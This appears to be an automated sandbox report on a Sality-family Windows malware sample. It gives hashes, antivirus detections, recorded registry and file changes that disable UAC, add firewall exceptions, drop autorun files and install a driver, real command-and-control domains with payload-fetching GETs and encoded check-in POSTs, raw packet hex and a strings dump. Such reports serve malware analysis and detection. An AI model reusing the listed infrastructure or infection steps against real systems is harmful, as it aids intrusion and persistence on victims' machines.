Analysis | #totalhash

Analysis Date	2014-04-30 00:33:43
MD5	c0604710fc2a026149a2f42b8ec8334e
SHA1	ff6428dfc70af8db22a9e220f980e1102c88d155

Static Details:

File type	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section	.text md5: d681da53549fbe2dc3ac40c634d128ce sha1: 752dc62aad6710809884637abe0f85b1c88c5dc7 size: 173056
Section	.rdata md5: e977908417aacae1d04d6617ed2fe13e sha1: 8e9d5635c1a95acfc31dac7a17fa3d3691e0ac41 size: 52736
Section	.data md5: 65f01e884d3b6e859b26769f9e7c7590 sha1: f14e8216aeea33746fec0ecbe3323a0440fddb72 size: 25600
Section	.reloc md5: c3e61e99dd0ff2dbb46c5ad805b89057 sha1: 10e737f326c5d0a595b0d406730c1bf50e98616b size: 3072
Section	.rrdata md5: b8f51fb12624162ebe296804d5d4d12c sha1: 46c0ca587bbd681c9f981afe8c80f68fcc3e84fb size: 81920
Timestamp	2013-03-31 15:14:51
Pdb path	@
PEhash	243d2ef0a15a6c94ead7205bf7a0e60a9e2542cc
IMPhash	09ace0653e9a1681c71aa59f915845b3
AV	F-Secure Anti-Virus 2013	Win32.Sality.OG
AV	AVG AntiVirus	Win32/Tanatos.M
AV	Emsisoft Command Line Scanner	Win32.Sality.OG
AV	Ad-Aware Command-Line	Win32.Sality.OG
AV	360 Safe	Win32.Sality.OG
AV	Avira Anti-Virus Command Line Scanner	W32/Sality.Y
AV	Microsoft Security Essentials 32bit	Virus:Win32/Sality.AM
AV	Quick Heal AntiVirus	W32.Sality.R
AV	Trend Micro System Cleaner (SysClean)	PE_SALITY.EN
AV	Ikarus Command-Line Scanner	Trojan-Spy.Win32.Agent.EO
AV	F-PROT Antivirus for Windows	W32/Sality.AK
AV	ArcaVir 2013 Antivirus	W32.Sality.Aa
AV	Rising Command-Line Scanner	Win32.KUKU.ky
AV	eScan Anti-Virus	Win32.Sality.OG
AV	McAfee Command-Line Scanner	W32/Sality.gen.z
AV	Sunbelt Vipre Antivirus version 3.0	Trojan.Win32.Gamarue.lvlv (v)
AV	ESET NOD32 Antivirus	Win32/Sality.NAR virus
AV	CA (Total Defense) Internet Security Suite	Win32/Sality.AA
AV	VirusBlokAda (Console scanner)	Virus.Win32.Sality.kaka
AV	Symantec Command-Line Scanner	W32.Sality.AE
AV	Fortinet Command-Line Scanner	W32/Sality.AA
AV	Avast! Professional Anti-Virus 8.0	No Virus
AV	Norman AntiVirus	win32/Sality.BBYL
AV	Sophos Command-Line Scanner	W32/Sality-AM
AV	Dr. Web Anti-Virus for Windows	Win32.Sector.5
AV	Kaspersky Anti-Virus	Virus.Win32.Sality.gen
AV	Command Anti-Malware	W32/Sality.AK
AV	MalwareBytes Anti-Malware PRO	No Virus
AV	ClamWin Antivirus (Clam AV Engine)	W32.Sality-56

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA ➝ NULL
Registry	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden ➝ 2
Registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Registry	HKEY_CURRENT_USER\Software\Administrator914\-993627007\1768776769 ➝ 26
Registry	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\malware.exe ➝ C:\malware.exe:*:Enabled:ipsec
Registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\00E35EEE ➝ NULL
Registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline ➝ NULL
Registry	HKEY_CURRENT_USER\Software\Administrator914\A1_0 ➝ 3432392762
Registry	HKEY_CURRENT_USER\SOFTWARE\ImageBase ➝ NULL
Creates File	C:\autorun.inf
Creates File	C:\Documents and Settings\Administrator\Local Settings\Temp\_install_\msiexec.exe
Creates File	C:\TEMP\FILES\monitor.exe
Creates File	C:\Documents and Settings\Administrator\Local Settings\Temp\01.tmp
Creates File	C:\11ab7
Creates File	C:\WINDOWS\SYSTEM.INI
Creates File	C:\uoleqe.pif
Creates File	PIPE\SfcApi
Creates File	C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
Creates File	PIPE\wkssvc
Creates File	C:\TEMP\FILES\AcroRd32.exe
Creates File	C:\122c5
Creates File	PIPE\lsarpc
Creates File	\Device\Afd\Endpoint
Creates File	C:\Documents and Settings\Administrator\Local Settings\Temp\xmefe.exe
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temp\01.tmp
Deletes File	C:\122c5
Deletes File	C:\11ab7
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temp\xmefe.exe
Creates Process	"C:\Documents and Settings\Administrator\Local Settings\Temp\_install_\msiexec.exe"
Creates Mutex	services.exeM_616_
Creates Mutex	smss.exeM_492_
Creates Mutex	svchost.exeM_848_
Creates Mutex	svchost.exeM_804_
Creates Mutex	lsass.exeM_628_
Creates Mutex	Op1mutx9
Creates Mutex	userinit.exeM_236_
Creates Mutex	monitor.exeM_1128_
Creates Mutex	svchost.exeM_1016_
Creates Mutex	explorer.exeM_324_
Creates Mutex	csrss.exeM_548_
Creates Mutex	alg.exeM_1868_
Creates Mutex	malware.exeM_1280_
Creates Mutex	winlogon.exeM_572_
Creates Mutex	svchost.exeM_1108_
Creates Mutex	reader_sl.exeM_960_
Creates Mutex	spoolsv.exeM_1336_
Creates Mutex	svchost.exeM_1136_
Creates Mutex	svchost.exeM_1204_

Process
↳ C:\WINDOWS\system32\userinit.exe

Creates Mutex	userinit.exeM_236_
Creates Mutex	Op1mutx9

Process
↳ C:\WINDOWS\Explorer.EXE

Registry	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\WINDOWS\Explorer.EXE ➝ C:\WINDOWS\Explorer.EXE:*:Enabled:ipsec
Registry	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA ➝ NULL
Registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline ➝ NULL
Registry	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden ➝ 2
Creates File	C:\TEMP\FILES\monitor.exe
Creates File	C:\xahynx.cmd
Creates File	C:\Documents and Settings\Administrator\Local Settings\Temp\gyiiq.exe
Creates File	C:\TEMP\FILES\NOTEPAD.EXE
Creates File	C:\TEMP\FILES\wuauclt.exe
Creates File	C:\17ccc
Creates File	C:\WINDOWS\system32\drivers\sfkji.sys
Creates File	\Device\Afd\Endpoint
Creates File	C:\TEMP\FILES\xmefe.exe
Creates File	C:\170b6
Creates File	C:\174bd
Creates File	C:\TEMP\FILES\msfrnr.exe
Creates File	C:\autorun.inf
Creates File	PIPE\srvsvc
Creates File	C:\TEMP\FILES\reader_sl.exe
Creates File	C:\wnbw.pif
Creates File	asc3360pr
Creates File	C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
Creates File	PIPE\SfcApi
Creates File	C:\TEMP\FILES\AcroRd32.exe
Creates File	C:\TEMP\FILES\msiexec.exe
Deletes File	C:\174bd
Deletes File	C:\170b6
Deletes File	C:\autorun.inf
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temp\gyiiq.exe
Deletes File	C:\17ccc
Deletes File	C:\WINDOWS\system32\drivers\sfkji.sys
Creates Mutex	services.exeM_616_
Creates Mutex	smss.exeM_492_
Creates Mutex	svchost.exeM_848_
Creates Mutex	svchost.exeM_804_
Creates Mutex	lsass.exeM_628_
Creates Mutex	Op1mutx9
Creates Mutex	monitor.exeM_1128_
Creates Mutex	Shell.CMruPidlList
Creates Mutex	wuauclt.exeM_1428_
Creates Mutex	explorer.exeM_324_
Creates Mutex	svchost.exeM_1016_
Creates Mutex	msiexec.exeM_1596_
Creates Mutex	csrss.exeM_548_
Creates Mutex	alg.exeM_1868_
Creates Mutex	winlogon.exeM_572_
Creates Mutex	svchost.exeM_1108_
Creates Mutex	reader_sl.exeM_960_
Creates Mutex	spoolsv.exeM_1336_
Creates Mutex	svchost.exeM_1204_
Creates Mutex	svchost.exeM_1136_
Creates Service	asc3360pr - C:\WINDOWS\system32\drivers\sfkji.sys
Starts Service	IPFILTERDRIVER
Starts Service	asc3360pr

Process
↳ C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe

Creates Mutex	reader_sl.exeM_960_
Creates Mutex	Op1mutx9

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\_install_\msiexec.exe"

Creates Process	C:\WINDOWS\system32\wuauclt.exe
Creates Mutex	msiexec.exeM_1596_
Creates Mutex	Op1mutx9

Process
↳ C:\WINDOWS\system32\svchost.exe

Creates File	WMIDataDevice
Creates File	PIPE\lsarpc
Creates File	\Device\Afd\Endpoint

Process
↳ C:\WINDOWS\System32\svchost.exe

Registry	HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL
Creates File	PIPE\lsarpc
Creates File	C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates File	\Device\Afd\Endpoint

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Registry	HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝ NULL
Registry	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝ 7
Registry	HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝ NULL
Registry	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝ C:\WINDOWS\System32\spool\PRINTERS\\x00
Registry	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Providers\LogonTime ➝ NULL
Creates File	WMIDataDevice

Process
↳ C:\WINDOWS\System32\alg.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ C:\WINDOWS\system32\wuauclt.exe

Registry	HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry	HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\36874 ➝ C:\Documents and Settings\All Users\Local Settings\Temp\msfrnr.exe\\x00
Registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden ➝ NULL
Registry	HKEY_CURRENT_USER\Software\IMAGE_FILE_HEADER ➝ NULL
Registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File	C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File	C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File	C:\Documents and Settings\All Users\Local Settings\Temp\msfrnr.exe
Creates File	PIPE\lsarpc
Creates File	\Device\Afd\Endpoint
Creates File	\Device\Afd\AsyncConnectHlp
Creates File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temp\03.tmp
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temp\02.tmp
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temp\_INSTA~1\msiexec.exe
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temp\04.tmp
Creates Mutex	wuauclt.exeM_1428_
Creates Mutex	WininetConnectionMutex
Creates Mutex	c:!documents and settings!administrator!cookies!
Creates Mutex	3227095050
Creates Mutex	TLS
Creates Mutex	Op1mutx9
Creates Mutex	c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex	c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS	img.suckmycocklameavindustry.in
Winsock DNS	pe.suckmycocklameavindustry.in
Winsock DNS	sc.suckmycocklameavindustry.in

Network Details:

DNS	www.update.microsoft.com.nsatc.net Type: A 157.56.96.156
DNS	www.update.microsoft.com.nsatc.net Type: A 207.46.114.62
DNS	pe.suckmycocklameavindustry.in Type: A 50.116.32.177
DNS	sc.suckmycocklameavindustry.in Type: A 50.116.32.177
DNS	xdqzpbcgrvkj.ru Type: A 195.22.26.231
DNS	xdqzpbcgrvkj.ru Type: A 195.22.26.252
DNS	xdqzpbcgrvkj.ru Type: A 195.22.26.253
DNS	xdqzpbcgrvkj.ru Type: A 195.22.26.254
DNS	img.suckmycocklameavindustry.in Type: A 50.116.32.177
DNS	anam0rph.su Type: A 195.22.26.253
DNS	anam0rph.su Type: A 195.22.26.254
DNS	anam0rph.su Type: A 195.22.26.231
DNS	anam0rph.su Type: A 195.22.26.252
DNS	orzdwjtvmein.in Type: A 195.22.26.253
DNS	orzdwjtvmein.in Type: A 195.22.26.254
DNS	orzdwjtvmein.in Type: A 195.22.26.231
DNS	orzdwjtvmein.in Type: A 195.22.26.252
DNS	www.update.microsoft.com Type: A
DNS	ygiudewsqhct.in Type: A
DNS	bdcrqgonzmwuehky.nl Type: A
HTTP GET	http://pe.suckmycocklameavindustry.in/jxsgcplzuiernbxkgtpdzmivrfboeldd User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET	http://sc.suckmycocklameavindustry.in/anjxsgcplzuiernbxkgtpdzmivrfbovv User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST	http://xdqzpbcgrvkj.ru/in.php User-Agent: Mozilla/4.0
HTTP GET	http://img.suckmycocklameavindustry.in/thdqmavjfsocylhuqeanjxsgcplzuipp User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST	http://anam0rph.su/in.php User-Agent: Mozilla/4.0
HTTP POST	http://orzdwjtvmein.in/in.php User-Agent: Mozilla/4.0
Flows TCP	192.168.1.1:1033 ➝ 157.56.96.156:80
Flows UDP	192.168.1.1:1034 ➝ 8.8.4.4:53
Flows TCP	192.168.1.1:1036 ➝ 50.116.32.177:80
Flows TCP	192.168.1.1:1038 ➝ 50.116.32.177:80
Flows TCP	192.168.1.1:1039 ➝ 195.22.26.231:80
Flows TCP	192.168.1.1:1041 ➝ 50.116.32.177:80
Flows UDP	192.168.1.1:1040 ➝ 8.8.4.4:53
Flows TCP	192.168.1.1:1042 ➝ 195.22.26.253:80
Flows UDP	192.168.1.1:1043 ➝ 8.8.4.4:53
Flows TCP	192.168.1.1:1044 ➝ 195.22.26.253:80
Flows UDP	192.168.1.1:1045 ➝ 8.8.4.4:53
Flows UDP	192.168.1.1:1046 ➝ 8.8.4.4:53

Raw Pcap

0x00000000 (00000)   47455420 2f6a7873 6763706c 7a756965   GET /jxsgcplzuie
0x00000010 (00016)   726e6278 6b677470 647a6d69 76726662   rnbxkgtpdzmivrfb
0x00000020 (00032)   6f656c64 64204854 54502f31 2e310d0a   oeldd HTTP/1.1..
0x00000030 (00048)   41636365 70743a20 2a2f2a0d 0a416363   Accept: */*..Acc
0x00000040 (00064)   6570742d 456e636f 64696e67 3a20677a   ept-Encoding: gz
0x00000050 (00080)   69702c20 6465666c 6174650d 0a557365   ip, deflate..Use
0x00000060 (00096)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000070 (00112)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000080 (00128)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000090 (00144)   6f777320 4e542035 2e313b20 5356313b   ows NT 5.1; SV1;
0x000000a0 (00160)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x000000b0 (00176)   37323729 0d0a486f 73743a20 70652e73   727)..Host: pe.s
0x000000c0 (00192)   75636b6d 79636f63 6b6c616d 65617669   uckmycocklameavi
0x000000d0 (00208)   6e647573 7472792e 696e0d0a 436f6e6e   ndustry.in..Conn
0x000000e0 (00224)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000f0 (00240)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f616e6a 78736763 706c7a75   GET /anjxsgcplzu
0x00000010 (00016)   6965726e 62786b67 7470647a 6d697672   iernbxkgtpdzmivr
0x00000020 (00032)   66626f76 76204854 54502f31 2e310d0a   fbovv HTTP/1.1..
0x00000030 (00048)   41636365 70743a20 2a2f2a0d 0a416363   Accept: */*..Acc
0x00000040 (00064)   6570742d 456e636f 64696e67 3a20677a   ept-Encoding: gz
0x00000050 (00080)   69702c20 6465666c 6174650d 0a557365   ip, deflate..Use
0x00000060 (00096)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000070 (00112)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000080 (00128)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000090 (00144)   6f777320 4e542035 2e313b20 5356313b   ows NT 5.1; SV1;
0x000000a0 (00160)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x000000b0 (00176)   37323729 0d0a486f 73743a20 73632e73   727)..Host: sc.s
0x000000c0 (00192)   75636b6d 79636f63 6b6c616d 65617669   uckmycocklameavi
0x000000d0 (00208)   6e647573 7472792e 696e0d0a 436f6e6e   ndustry.in..Conn
0x000000e0 (00224)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000f0 (00240)   76650d0a 0d0a                         ve....

0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20786471   P/1.1..Host: xdq
0x00000020 (00032)   7a706263 6772766b 6a2e7275 0d0a5573   zpbcgrvkj.ru..Us
0x00000030 (00048)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000040 (00064)   612f342e 300d0a43 6f6e7465 6e742d54   a/4.0..Content-T
0x00000050 (00080)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000060 (00096)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000070 (00112)   6e636f64 65640d0a 436f6e74 656e742d   ncoded..Content-
0x00000080 (00128)   4c656e67 74683a20 38340d0a 436f6e6e   Length: 84..Conn
0x00000090 (00144)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x000000a0 (00160)   0a757071 63684373 38764654 4b464f56   .upqchCs8vFTKFOV
0x000000b0 (00176)   6d6e494b 47497769 4c72486f 33567436   mnIKGIwiLrHo3Vt6
0x000000c0 (00192)   38543379 71766851 75325471 6574516e   8T3yqvhQu2TqetQn
0x000000d0 (00208)   33714979 37513662 70546644 55745949   3qIy7Q6bpTfDUtYI
0x000000e0 (00224)   66745a33 334e4230 424b516b 67396d59   ftZ33NB0BKQkg9mY
0x000000f0 (00240)   3371773d 3d0a                         3qw==.

0x00000000 (00000)   47455420 2f746864 716d6176 6a66736f   GET /thdqmavjfso
0x00000010 (00016)   63796c68 75716561 6e6a7873 6763706c   cylhuqeanjxsgcpl
0x00000020 (00032)   7a756970 70204854 54502f31 2e310d0a   zuipp HTTP/1.1..
0x00000030 (00048)   41636365 70743a20 2a2f2a0d 0a416363   Accept: */*..Acc
0x00000040 (00064)   6570742d 456e636f 64696e67 3a20677a   ept-Encoding: gz
0x00000050 (00080)   69702c20 6465666c 6174650d 0a557365   ip, deflate..Use
0x00000060 (00096)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000070 (00112)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000080 (00128)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000090 (00144)   6f777320 4e542035 2e313b20 5356313b   ows NT 5.1; SV1;
0x000000a0 (00160)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x000000b0 (00176)   37323729 0d0a486f 73743a20 696d672e   727)..Host: img.
0x000000c0 (00192)   7375636b 6d79636f 636b6c61 6d656176   suckmycocklameav
0x000000d0 (00208)   696e6475 73747279 2e696e0d 0a436f6e   industry.in..Con
0x000000e0 (00224)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000f0 (00240)   6976650d 0a0d0a                       ive....

0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20616e61   P/1.1..Host: ana
0x00000020 (00032)   6d307270 682e7375 0d0a5573 65722d41   m0rph.su..User-A
0x00000030 (00048)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000040 (00064)   300d0a43 6f6e7465 6e742d54 7970653a   0..Content-Type:
0x00000050 (00080)   20617070 6c696361 74696f6e 2f782d77    application/x-w
0x00000060 (00096)   77772d66 6f726d2d 75726c65 6e636f64   ww-form-urlencod
0x00000070 (00112)   65640d0a 436f6e74 656e742d 4c656e67   ed..Content-Leng
0x00000080 (00128)   74683a20 38340d0a 436f6e6e 65637469   th: 84..Connecti
0x00000090 (00144)   6f6e3a20 636c6f73 650d0a0d 0a757071   on: close....upq
0x000000a0 (00160)   63684373 38764654 4b464f56 6d6e494b   chCs8vFTKFOVmnIK
0x000000b0 (00176)   47497769 4c72486f 33567436 38543379   GIwiLrHo3Vt68T3y
0x000000c0 (00192)   71766851 75325471 6574516e 33714979   qvhQu2TqetQn3qIy
0x000000d0 (00208)   37513662 70546644 55745949 66745a33   7Q6bpTfDUtYIftZ3
0x000000e0 (00224)   334e4230 424b516b 67396d59 3371773d   3NB0BKQkg9mY3qw=
0x000000f0 (00240)   3d76650d 0a0d0a                       =ve....

0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 206f727a   P/1.1..Host: orz
0x00000020 (00032)   64776a74 766d6569 6e2e696e 0d0a5573   dwjtvmein.in..Us
0x00000030 (00048)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000040 (00064)   612f342e 300d0a43 6f6e7465 6e742d54   a/4.0..Content-T
0x00000050 (00080)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000060 (00096)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000070 (00112)   6e636f64 65640d0a 436f6e74 656e742d   ncoded..Content-
0x00000080 (00128)   4c656e67 74683a20 38340d0a 436f6e6e   Length: 84..Conn
0x00000090 (00144)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x000000a0 (00160)   0a757071 63684373 38764654 4b464f56   .upqchCs8vFTKFOV
0x000000b0 (00176)   6d6e494b 47497769 4c72486f 33567436   mnIKGIwiLrHo3Vt6
0x000000c0 (00192)   38543379 71766851 75325471 6574516e   8T3yqvhQu2TqetQn
0x000000d0 (00208)   33714979 37513662 70546644 55745949   3qIy7Q6bpTfDUtYI
0x000000e0 (00224)   66745a33 334e4230 424b516b 67396d59   ftZ33NB0BKQkg9mY
0x000000f0 (00240)   3371773d 3d0d0a                       3qw==..

Strings

.U
.....
$
$.
M
.j
.
.U
-
.
 
~
m
.
.
.,.
.
.?.
.
r.
A@ s
dfe 
e.rp
         (((((                  H
jV.s
@l/@
 -PS
Rar 
s de
tDiG
ussm
$$"0$$$
0 0&0*00040:0>0D0H0N0R0X0\0b0f0l0p0v0z0
050<0@0D0H0L0P0T0X0
0b0h0l0p0t0
0Z0`0l0
1$1*10161<1B1H1N1T1Z1`1f1
1%1@1G1L1P1T1q1
1:2@2D2H2L2
=&=1=6=@=E=z=
1	o~h3
2(232E2P2W2\2o2
2^2d2k2t2{2
23ug$$
2cr@Lrad
:":*:2:::D:M:U:l:u:
:!:':,:2:;:D:M:X:c:i:}:
:!:2:e:s:
? :2j%a
2~k=wx
2rf.l%
2sYnFR
2toeFl
$$2$$V
3*303>3I3^3f3l3q3w3
3$3<3\3
353l3r3J4T4_4l4y4
36Uuu 
3(ecc|Qu
3<"HI`k
3Q#4X8
3RXV]@P
^3Se]x
3$$u	W
>3?=?W?]?f?~?
3x3+xPu
4(404;4I4~4
4"4)484B4I4P4V4l4s4z4
4,545:5@5F5K5Q5Y5_5g5o5u5
464?4H4O4_4q4
+4@#{rIM
?*?4???S?a?n?t?z?
54zxCV^
5-535C5N5`5s5~5
5"5?5I5W5b5j5
5%5:5k5r5
5)6A6q6
5hbGGu
5i&UU6
5j$$Vrjj
$$)5*SS]
5uYSVV
5U]Yx'Vx
!.;5"wT
616K6Q6d6j6p6u6}6
6*636P6
6$6(60646<6@6H6L6
66'OFj
696G6x6~6
6Je?-8
$$6L$$
$6$.q\
6S$$\GGg
6UMMB1MM
;%;,;7;@;
7%1MMj
7%7+707D7Q7W7k7t7~7
7$7,72787M7S7`7f7p7x7~7
7>7D7e7o7z7
.7x"zZ$6
8$$$;$
858L8g8
8%8/858x8
8&8F8X8s8y8
8;|;9|M
8c0!Ap
8=&j5+%f
$$$8$jj
8/,q"0
$8QFMy
8UWxiT
[94gU94
9#929;9A9Q9_9t9z9
9&9,91979G9P9j9{9
9$9=9G9R9\9j9~9
9%9C9T9g9|9
9Ede   o
@9	GGuu
9JMM[-
>9PNa\
9UruuUqU
a$,$$$]
aasiN,
abnormal program termination
aGG$\$
AJcot@
 .%aJxI
AK]/jSS"
= >A>O>V>a>s>~>
Ap`1`z{
=%=+=A=R=[=a=r=x=
A/r@in
ASji'j
"a$$SwS
aUUM'M
AuuU|QUG
AxSSjV
b8bN]0_D
B+ezG8&
$$$BF*$
?#bL4;
bMMUKU
Bn=OdM
B.rrdata
$$bSSG
@b??_@t
B?v`J@KbA
B~zu]}
$@c$$$
c>6 1t
 __C'E
$c	$MM
cN dio
CompareStringA
CompareStringW
C?oR@?
CpD2'Q
{!c\@r
CroPSW:
CUb;UGG=
$$$c$u^t
<!<D<^<c<v<|<
dgU:h)
*<d>hz N'
di e c
djG%xG\
,d,_.l
:~:(^dm
@D$$MFM
DMMOjuj
dM ~v{
DOMAIN error
D:\Other\Opposite\Chord\Will\Test\ask\Farm\over\surfaceFight.pdb
dr@mpi
DSUVWh
dt5Jdl
d/tbIo
DUq$$$
dUTUGG
DU_;UMM$
dYMkRxj
$$E`$$
E@7]VE
e8"lZbj6L
 e bhl
e$$@$$$h$
$[$$EL$
EnterCriticalSection
 e. ou
e@rVCar
Es tse
et trhe 
+E$$U$UUU
/EvYz#N
ExitProcess
F?esjM
f`GSS9
filo  
Fj.q3`
FjtjMM8SS
FlF=+t
- floating point not loaded
$f$MMvX
F$$$.$MMZ
FreeEnvironmentStringsA
FreeEnvironmentStringsW
f$$S$S
FxN|<<]
|F^y`C
G3\MkT+G
g++7*lY
GetACP
GetActiveWindow
GetCommandLineA
GetCommandLineW
GetCPInfo
GetCurrentProcess
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLocalTime
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleA
GetOEMCP
GetProcAddress
GetStartupInfoA
GetStartupInfoW
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemTime
GetSystemTimeAsFileTime
GetTimeZoneInformation
GetVersion
GetVolumeInformationW
GG>d$$
GGG'$$$'$
GGI:UU
GGj[j$$	
GGju4j
GG$k$jj
GGMjqM
$GG._rMM
GGShLS
GGt|rUU
GG$;$u
$GG'UU
GGuXu$$
Gh7GGG
GI=G$)
Gjj1jjSf
Gj%nY,
Gk&G$%R$
GkRG$$*
GLGUU^
Go=G $$
?gqSauS
	'$G%RG
GSGSS<
gS$$o]
$g$SSy
gthe.rc
,GUs!L
.GUSUjj4
GU+ (U
gUUM>M
GVjGUk
Gx3(t_
:G$$y%jj
$$($$H
H5;6.,
h$$5UU
h7f4E;
H' CQp
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
Hg)U1;,
HGUUyMM
hK#hV5
HMM$jj$UU5
h naigeNn
hNx`cpv
)HSGGb9
}htGLE
HUdXpU$$
$$HuuY
hwa0,ur  
H:Z3	-w
:HzTY+$
IAb\/O
Ic"IY~Qz
ID+eUU
iH`;-H
.II}]o
I$j0j$]q3$
in..A/
InitializeCriticalSection
iPzllK,
:.:I:r:
is@ItVe
$I$SSe
(It&(fY
<%=*=I=V=c=m=w=
Izy$$$
^$%@}j
j5cp"?
j5jM@GOM
/J6T$M
JanFebMarAprMayJunJulAugSepOctNovDec
$$j[bj
jDfjSS
jGGE$$
jGGt$$
jhY8=cd
_[jj$;$
$$< jj
)jjDUU4
jjg\$$Mi
jjGMUU
jjGqqG
jj_$$i
jj[jj/
$jjm1$$P
%jj#MMH6
jjMpMjjh
]jjSaS
jjub^u
jjU\U$
$[$j@jv.
jJVjMM
jjV[UOU
jMin\L:
j[mKl{V
JNuE	[&
j;pj$$
Jp-PE,
%$jQ2j
jq j$$
js$k"~
jtjUhU
JUU"$$
jUUL8$$
ju,vyG
jwhjMM
jw&Qj$$c]
j<XdjuuD
$=k&<.
&k3mdI
KERNEL32.dll
{'#-$	KI	
'K!"Iay
k-jj+$
Kjjs$$
(.| Km
k)MM$;"+
KN=+cML
KP62xs
Kth>}i
kUUUtUMm[MM
	KX3@b_V
KY	)hX
ky$$UPU
L]5&V1B
L$$ BN$$
LCMapStringA
LCMapStringW
lD3%`F
 l I Ut,n 
l$$$/LZ
/L;N+Y
LoadLibraryA
Lo@XMM
